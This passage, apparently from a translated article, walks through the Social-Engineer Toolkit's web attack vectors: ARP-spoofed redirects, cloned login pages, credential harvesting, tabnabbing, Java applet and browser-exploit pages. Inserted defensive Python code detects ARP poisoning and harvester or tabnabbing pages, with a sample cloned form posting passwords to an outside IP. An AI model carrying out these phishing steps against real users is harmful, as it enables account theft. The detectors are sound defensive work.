This attack vector provides us with more interesting, sophisticated and
diverse ways of attacking users than the first one. Speaking of the web route, you can pick out one feature common to attacks of this type (with a single exception): a fake web page on an automatically started web server. Although modern browsers try to fight fake sites, the final decision on whether or not to trust a site is made by a human, and sometimes simple human inattention is all it takes.
As mentioned earlier, SET works great in conjunction with ettercap, and so that the user does not notice the trick in the address bar, you can use ARP spoofing. In that case the victim lands on our fake site instead of the original one. Naturally, the victim must be on the same subnet as us.
You can also lure a user to our site with the help of XSS, a mass mailing, a call from the provider's technical support ... In principle, the matter here is limited only by your imagination. Speaking of mail, it is worth remembering the first attack vector, which works fine through the web as well. To do this, when composing the text of the letter, we add a URL that was previously shortened with the www.bit.ly service (or the like). Naturally, the mail attack vector does not provide a way to send a normal file, but nothing stops you from replacing the generated file with a normal one in /pentest/exploits/SET/src/program_junk/<name_file>.pdf.
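As an added example (not code from SET or from the original post), here is how a defender on the same subnet would spot the ARP-spoofing redirect described above: a gateway whose MAC address flips mid-session, or one MAC answering for both the gateway and a host. The log format, timestamps, addresses and the gateway IP are constructed for the example.

```python
# Added example (not part of SET or the original post): an ARP-spoofing
# redirect to a cloned site only works on the victim's own subnet, so a host
# or sensor can flag a gateway whose MAC changes mid-session. The log format
# and addresses below are constructed for the example.
import re
from collections import defaultdict

ARP_LOG = """\
10:00:01 reply 192.168.1.1 is-at 00:11:22:33:44:55
10:00:02 reply 192.168.1.20 is-at aa:bb:cc:dd:ee:01
10:03:15 reply 192.168.1.1 is-at de:ad:be:ef:00:01
10:03:16 reply 192.168.1.20 is-at de:ad:be:ef:00:01
10:03:17 reply 192.168.1.1 is-at 00:11:22:33:44:55
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})$", re.I)

def parse_arp_log(text):
    """Yield (timestamp, ip, mac) per well-formed line; others are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["ts"], m["ip"], m["mac"].lower()

def find_poisoning(text, gateway):
    """Return findings: gateway MAC flips and one MAC answering for several IPs."""
    ip_macs = defaultdict(list)   # ip -> [(ts, mac)] with consecutive repeats folded
    mac_ips = defaultdict(set)    # mac -> IPs it claimed
    for ts, ip, mac in parse_arp_log(text):
        if not ip_macs[ip] or ip_macs[ip][-1][1] != mac:
            ip_macs[ip].append((ts, mac))
        mac_ips[mac].add(ip)
    findings = []
    # A gateway whose MAC changes mid-session is the classic poisoning symptom.
    history = ip_macs.get(gateway, [])
    for (_, old), (ts, new) in zip(history, history[1:]):
        findings.append(f"gateway {gateway} changed {old} -> {new} at {ts}")
    # A single MAC claiming both the gateway and a host is the spoofer in the middle.
    for mac, ips in mac_ips.items():
        if len(ips) > 1:
            findings.append(f"{mac} answers for {len(ips)} IPs: {sorted(ips)}")
    return findings
```

Run against the constructed log it reports two gateway flips and one MAC claiming both the gateway and the host; a log where every IP keeps a single MAC yields nothing.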
Since this vector boils down to creating a fake website and luring a victim to it, SET takes the first part of the plan and copes with it perfectly, providing us with three options for creating such a site:
- Gmail, Google, Facebook, Twitter and Java Required presets
- Site cloning
- Own site
The Java Required preset, when you land on it, shows a page with a message that Java is required to view it and detailed instructions on how to install it. This preset is the best choice when conducting a Java Applet attack, but more on that later.
The second mode is the tastiest: a complete clone of any site's web page. All you have to do is give the toolkit the required URL, and the rest is a matter of technique. After a few seconds we already have a copy of any web page. The last mode gives you the opportunity to host your own website by specifying only the directory on disk where it is located. Here you can deploy anything from a large site to a single page with a "404", "Preventive maintenance in progress", "Loading ...", or "The content of this site is incompatible with your browser, try opening the link in IE" message. The main thing is that the victim suspects nothing and stays on the site as long as possible.
The first thing we see when entering the web attack item is the Java Applet attack. The Java Applet presents a fake Java certificate, and if the target accepts it, it runs a Metasploit payload. The main advantage of this method is that we don't care which OS and which browser the user is running, as long as Java is on their machine.
And of course nobody has cancelled the exploitation of browser vulnerabilities; for this purpose there is the item "The Metasploit Browser Exploit Method". Here SET plants an exploit on the page we created, where it waits in the wings. Since most of the new exploits target IE (and it is not a given that the victim uses it), it is possible, with some social engineering, to get the user to follow the link using IE; as practice shows, this is quite doable. The "Credential Harvester" method is very simple both in implementation and in use, since its task is to collect all the information the user entered on the page of the site we prepared. So it is very easy to use it to siphon off an unsuspecting user's authentication data.
Many people keep a lot of tabs open while surfing the Internet: frequently visited sites, something to read later, etc. With a large number of open tabs, over time it becomes quite hard to remember which ones you opened yourself and which were sent to you to look at via ICQ, Skype, Jabber or e-mail. This is exactly what the Tabnabbing attack is designed for. This attack builds a special page that initially says "Please wait while the site loads ...", and then, when the user gets tired of waiting for the page to load and switches to another tab in the browser, our prepared page changes its look to that of the popular e-mail service whose authentication data we want to borrow. The next time the victim looks through his tabs, he stumbles upon a very familiar interface and may well want to check his mail in this window (rather than typing the same address again in a new one). From then on our page works the same way as the Credential Harvester method. And since SET 0.6.1 it has been possible to use SSL (with both a self-signed and a purchased certificate), so the attack can be even more powerful and beautiful.
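As an added example (not SET's code or the post's), here is a check a mail-link sandbox or web proxy could run over a landing page to catch both the cloned-page Credential Harvester and the Tabnabbing page described above: a password form posting to a host that is not a known login host, and script that rewrites the page once the tab loses focus. The HTML samples, hostnames and the trusted-host list are constructed for the example.

```python
# Added example (not SET's code): scan a landing page for a password form that
# posts to an untrusted host (credential harvester on a cloned page) and for
# script that rewrites the page on focus loss (tabnabbing). All samples constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class _PageScan(HTMLParser):
    # Collects form actions, whether a password field exists, and script text.
    def __init__(self):
        super().__init__()
        self.actions, self.scripts = [], []
        self.has_password = self._in_js = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True
        elif tag == "script":
            self._in_js = True
    def handle_endtag(self, tag):
        self._in_js = self._in_js and tag != "script"
    def handle_data(self, data):
        if self._in_js:
            self.scripts.append(data)

FOCUS_EVENTS = re.compile(r"\b(onblur|blur|visibilitychange|pagehide)\b", re.I)
REWRITE = re.compile(r"\blocation(\.href)?\s*=(?!=)|\blocation\.replace|\bdocument\.write", re.I)

def analyze_page(page_url, html, trusted_hosts):
    """Return findings for html served at page_url; trusted_hosts are the real login hosts."""
    p = _PageScan()
    p.feed(html)
    findings = []
    for action in (p.actions if p.has_password else []):
        host = urlparse(urljoin(page_url, action)).hostname or ""
        if host not in trusted_hosts:
            findings.append(f"password form posts to untrusted host {host!r}")
    js = "\n".join(p.scripts)
    if FOCUS_EVENTS.search(js) and REWRITE.search(js):
        findings.append("script rewrites the page on focus loss (tabnabbing pattern)")
    return findings

# Constructed samples: a cloned login page served from a bare IP, and a benign page.
CLONED = """<form action="http://203.0.113.10/post.php"><input name="u">
<input type="password" name="p"></form>
<script>window.onblur = function () { location.replace('/login.html'); };</script>"""
BENIGN = """<form action="/login"><input type="password" name="p"></form>
<script>document.title = 'Inbox';</script>"""
TRUSTED = {"accounts.example.test"}
```

The cloned sample produces two findings (untrusted form target and the focus-loss rewrite); the benign page served from the trusted host produces none.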
The "Man Left in the Middle Attack" method was contributed to the toolkit by a person with the nickname Scythe and uses the HTTP Referer header to collect data from the fields the user has filled in on the site. This is the only method for which you do not have to create a fake website, but to carry it out you need an XSS vulnerability on the real site whose data we are interested in. It turns out we simply use XSS on a real site in Credential Harvester mode and get the profit we need.